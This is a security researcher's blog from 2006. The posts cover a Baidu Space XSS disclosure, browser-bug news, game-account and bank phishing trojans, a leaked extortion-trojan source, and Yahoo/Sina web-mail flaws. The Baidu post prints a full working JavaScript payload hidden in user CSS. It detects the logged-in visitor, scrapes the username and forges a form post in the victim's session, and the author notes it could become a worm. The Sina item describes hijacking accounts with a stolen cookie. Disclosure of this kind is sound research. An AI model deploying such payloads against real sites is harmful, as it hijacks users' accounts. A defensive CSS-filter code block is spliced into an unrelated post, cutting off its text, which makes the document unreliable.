Dai Shuo's Space
July 24
Baidu Space XSS Vulnerability

Baidu (Nasdaq: BIDU) launched its blog service, Baidu Space Beta, 10 days ago. It is a blog system with no highlights at all, but I still moved my Chinese blog there for better bandwidth and stability. Here is an XSS vulnerability I found last Friday.

1. Script injection

Baidu Space allows users to change their spaces' CSS freely, but the system does not filter injected scripts out of it. For example, a CSS definition like

```css
body { background:url(javascript:alert('hello')); }
```

will pop up a message box. Users can inject arbitrary scripts into the CSS of their spaces. This is dangerous because bad guys can plant a trojan by injecting some exploits.

2. The XSS attack

Baidu uses a cookie to tell whether a user is logged on. The cookie's domain is baidu.com; in other words, any script served from any baidu.com host can read and use that cookie freely. Once you send commands using the cookie stolen from a user, Baidu recognizes you as the victim himself. The PoC below does not even need to steal the cookie: because the injected script runs on hi.baidu.com inside the victim's browser, the requests it sends carry the victim's session cookie automatically. It adds a friend link to your Friend List as long as you have a Baidu Space and are logged on. Here is the link, http://hi.baidu.com/somethingbad, and here is the code I injected into http://hi.baidu.com/somethingbad's CSS:

```css
#header{height:89px;background:url("javascript:document.body.onload = function(){
  /* cross-browser XMLHttpRequest; IE6 still needs the ActiveX fallback */
  var req = null;
  if(window.XMLHttpRequest) req = new XMLHttpRequest();
  else if(window.ActiveXObject){
    var msxml = new Array('MSXML2.XMLHTTP.5.0', 'MSXML2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP', 'Microsoft.XMLHTTP');
    for(var i=0;i<msxml.length;i++){ try{ req = new ActiveXObject(msxml[i]); break; }catch(e){} }
    try{ req.overrideMimeType('text/xml') }catch(e){}
  }
  /* fetch the current page; the browser attaches the victim's baidu.com cookie */
  req.open('get','.',false); req.send();
  var s=req.responseText;
  /* a logout link means the visitor is logged on; the user name follows the first <strong> */
  p=s.indexOf('passport.baidu.com/?logout');
  if(p>0) {
    p=s.indexOf('<strong>');
    if(p>0) {
      p=s.indexOf('/',p); p2=s.indexOf(String.fromCharCode(34),p);
      var user=s.substring(p+1,p2);
      var name='Here is a bad site';
      var link='http://hi.baidu.com/somethingbad';
      var desc='This link was added by an XSS script';
      /* the same form the Friend List editor posts, now sent on the victim's behalf */
      var url='/'+user+'/commit';
      var data='ct=6&cm=1&spRef='+escape('http://hi.baidu.com/'+user)+'%2Fmodify%2Fbuddylink%2F0&spBuddyName='+escape(name)+'&spBuddyURL='+escape(link)+'&spBuddyIntro='+escape(desc);
      req.open('post',url,false); req.send(data);
      alert('A friend link has been added to your space at http://hi.baidu.com/' +user);
    }
  } else { alert('You are not a logged Baidu user.'); }
}"); }
```

3. Web 2.0 worm opportunity

The problem is quite similar to the Samy case on MySpace. A Web 2.0 worm could be built on such XSS vulnerabilities: with a slight modification, the code could copy itself into the victim's CSS, and a worm comes into being. Baidu responded fast when its verification code (CAPTCHA) algorithm got cracked. I hope it does a good job this time too.

July 05
The Month of Browser Bugs

H D Moore opened the Browser Fun blog on July 2nd. Here is their welcome post:

"This blog will serve as a dumping ground for browser-based security research and vulnerability disclosure. To kick off this blog, we are announcing the Month of Browser Bugs (MoBB), where we will publish a new browser hack, every day, for the entire month of July. The hacks we publish are carefully chosen to demonstrate a concept without disclosing a direct path to remote code execution. Enjoy!"

So far, they have published 5 bugs. Affected browsers are IE, Firefox and Safari. See the bug list below:

The blog is really cool, but unfortunately Chinese users cannot access it directly, since the GFW has banned the whole blogspot.com domain. Here are 2 simple ways to bypass the GFW:
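Back to the CSS injection in the July 24 Baidu Space post above. As an added example that is not part of the original post and is not Baidu's own code, here is the kind of check the service should have applied to a user-submitted stylesheet before storing it. It decodes CSS escape sequences first, so an obfuscated "\6a avascript:" is seen as "javascript:", strips control characters, and then rejects any url() whose scheme is not http or https, together with the IE and Mozilla constructs that evaluate script or pull unchecked content from a stylesheet. The sample stylesheets (including shortened versions of the post's two payloads) are constructed for the demonstration; the check returns a verdict rather than a "cleaned" sheet, since rewriting CSS safely is much harder than rejecting it.

```javascript
// Added example (not from the original post, not Baidu's code): a verdict on
// user-supplied CSS of the kind Baidu Space should have computed before saving
// a user's custom stylesheet.

// Decode CSS escapes ("\6a " -> "j", "\:" -> ":") and strip control characters,
// so obfuscated tokens are checked in their decoded form.
function decodeCssEscapes(css) {
  return css
    .replace(/\\([0-9a-fA-F]{1,6})\s?/g, (_, hex) => {
      const cp = parseInt(hex, 16);
      return cp === 0 || cp > 0x10ffff ? '\ufffd' : String.fromCodePoint(cp);
    })
    .replace(/\\(.)/g, '$1')
    .replace(/[\u0000-\u001f\u007f]/g, '');
}

// A url() value is acceptable only if it is relative (a same-origin resource)
// or uses http/https; javascript:, vbscript:, data: and unknown schemes fail.
function isSafeUrl(value) {
  const v = value.trim().toLowerCase();
  const m = /^([a-z][a-z0-9+.-]*):/.exec(v);
  if (!m) return true;
  return m[1] === 'http' || m[1] === 'https';
}

// Constructs that evaluate script or load unchecked content from a stylesheet
// in the browsers of the day (IE6/7, Firefox 1.x).
const FORBIDDEN = [
  { name: 'expression()', re: /expression\s*\(/i },   // IE dynamic properties
  { name: 'behavior',     re: /behavior\s*:/i },      // IE .htc behaviors
  { name: '-moz-binding', re: /-moz-binding\s*:/i },  // Firefox XBL bindings
  { name: '@import',      re: /@import\b/i },         // external stylesheet
  { name: 'markup',       re: /<\/?[a-z]/i },         // stray HTML inside CSS
];

// Returns { ok, reasons }; a sheet with any reason should be rejected outright.
function checkUserCss(css) {
  const decoded = decodeCssEscapes(css);
  const reasons = [];
  for (const f of FORBIDDEN) {
    if (f.re.test(decoded)) reasons.push('forbidden construct: ' + f.name);
  }
  // quoted or unquoted url() token; the value is checked after decoding
  const urlRe = /url\s*\(\s*(['"]?)([\s\S]*?)\1\s*\)/gi;
  let m;
  while ((m = urlRe.exec(decoded)) !== null) {
    if (!isSafeUrl(m[2])) reasons.push('unsafe url(): ' + m[2].slice(0, 40));
  }
  return { ok: reasons.length === 0, reasons };
}

// Constructed samples: a benign sheet, a relative url(), the two payloads from
// the post (shortened), an escape-obfuscated variant, and an IE expression().
const SAMPLES = {
  benign:   'body { background: url(http://img.example.invalid/bg.png) no-repeat; color: #333; }',
  relative: '#header { background: url("/skin/header.gif") }',
  popup:    "body { background:url(javascript:alert('hello')); }",
  header:   '#header{height:89px;background:url("javascript:document.body.onload = function(){ alert(1) }"); }',
  escaped:  'div { background: url(\\6a avascript:alert(1)) }',
  expr:     'div { width: expression(alert(document.cookie)); }',
};

// Run every sample through the check; returns { name: ok } for inspection.
function auditSamples() {
  const verdicts = {};
  for (const [name, css] of Object.entries(SAMPLES)) {
    verdicts[name] = checkUserCss(css).ok;
  }
  return verdicts;
}

console.log(auditSamples());
// { benign: true, relative: true, popup: false, header: false, escaped: false, expr: false }
```

The decoding step matters more than the scheme test: a filter that only looks for the literal string "javascript:" is bypassed by a CSS hex escape or an embedded tab, both of which the browser quietly normalises before it resolves the URL.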
June 30
A Caution to Chinese WoW Players

One of my colleagues told me that he found a suspicious post on MOP's WoW forum last night. All hyperlinks inside the post pointed to the same URL, and when he clicked one, IE stopped responding. After studying the source, I found that the links lead users to a malicious site, which exploits 6 different critical flaws to install trojans. Here is the list of the exploited flaws:

Fortunately, vendors have issued patches for all of them. The trojans to be installed target 3 popular online games: World of Warcraft, Legend of Mir and Menghuan Xiyou (Fantasy Westward Journey). Around 530 players have read the phishing post in the past 40 hours, and the number is still increasing. Do not open the post shown below, and if you already did, run antivirus software with the latest database immediately and change your passwords afterwards.
June 28
A Paper on Defeating GFW

A post on the SecuriTeam Blogs led me to a paper on how to defeat the "Great Firewall" of China. The paper explains how the GFW works and proposes a way to beat it. It is worth reading, and I hope some of you can download the paper before it gets banned.

Phisher Targets ICBC Accounts

We received a few variants of a phishing trojan which targets ICBC (Industrial and Commercial Bank of China) user accounts. Once launched, the trojan watches the URLs opened in IE and pops up a phishing dialog box when the victim tries to log on to the ICBC online bank. We have detected a dozen infections; the real number of victims may be many times that. The phishing window, filled with a screenshot of the online bank's web page plus some hoax text, tries to persuade the victim to submit his/her account password. Stolen information is sent to the VXer (virus writer) by email. See the picture below (click it to view a large one).

Screenshots are one of the most common tricks used by phishing trojans. It is easy to notice the trick if you click some controls on the window, e.g. try dragging the scrollbars: a picture does not respond.

June 23
Extortioner Opened Trojan Source

A few days ago, I blogged about a trojan extortioner, Trojan/Agent.bq, which was then widely reported by Chinese media in the past week. The trojan author, who hardcoded his bank account, cell phone number and real name into his malware, contacted us through MSN and left evidence of illegal income. As a result, he became more famous for his carelessness.

Last night, he drew our attention again by posting viral source code to a public forum. His posts were confirmed to be the source of Trojan/Agent.bq. The motivation might be twofold. One is to set off an explosion of variants; the other is to protect the VXer himself, since he might no longer be the only person who owns the source. Unfortunately, neither is very likely to be achieved. The source was posted to a non-technical forum and stayed online for just 5 or 6 hours in the very early morning. I do not think a variant explosion will really happen unless the source is published again in the right place at the right time. While the posts were downloaded by almost nobody, however, they exposed the author's IP address, which would help the police locate him more easily.

June 22
Naked Girl Scores in Soccer Game

Are you bored with World Cup games played by men? If so, our newly found trojan probably meets your need. The malicious file was named "Naked Girl Playing Soccer". When launched, it plays a 23-second video in which a naked girl kicks a 20-yard field goal. See the snapshot below.

However, a variant of Backdoor/Huigezi (alias Backdoor.Graybird) is dropped along with the video. Hackers can take complete control over infected PCs. A technical report (in Chinese) has been published on our company's website for those who want more details.

June 21
More comments about Yahoo and Sina web services

A few days ago, I was a little worried that the Yamanner worm would encourage hackers to find more vulnerabilities in Yahoo web services. Now the prediction has come true. A series of proofs of concept were published on the full-disclosure mailing list today. Multiple Yahoo vulnerabilities were involved, including authentication bypass, session binding, cookie encoding weaknesses and cross-site scripting. Yahoo has work to do.
```
Date: Mon, 12 Jun 2006 22:43:11 +0800

--=====003_Dragon577540504666_=====
this is a test.
--=====003_Dragon577540504666_=====
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
--=====003_Dragon577540504666_=====--
```

The user's cookie will be displayed in the mail body. And of course the cookie could be submitted to some guy's database as well. Once we send a GET request to mail.sina.com.cn with someone's cookie, we can log on to his account, and thus an authentication bypass occurs.
June 19
Microsoft's Happy Weekend

A few things happened to Microsoft last weekend; at least two of them are worth a mention here.

First, a new 0-day vulnerability in Excel was confirmed by the MSRC last Saturday. The malicious sample was first reported on June 14, the day after Microsoft's Patch Tuesday. Technical details are not public. I do not think MS will release an out-of-cycle patch for it, so Excel will probably remain exploitable until July 11. Here are some links about the 0-day:

Microsoft Excel 0-day Vulnerability FAQ
Reports of a new vulnerability in Microsoft Excel
New Excel zero-day flaw used in attacks

Second, Microsoft France was hacked. See the snapshot below (click it to view the large picture). TiTHacK, the hacker, has been really active these days, and Microsoft.com is his/her next target. Is it another 0-day in Win2003 + IIS 6.0? Let's wait and see.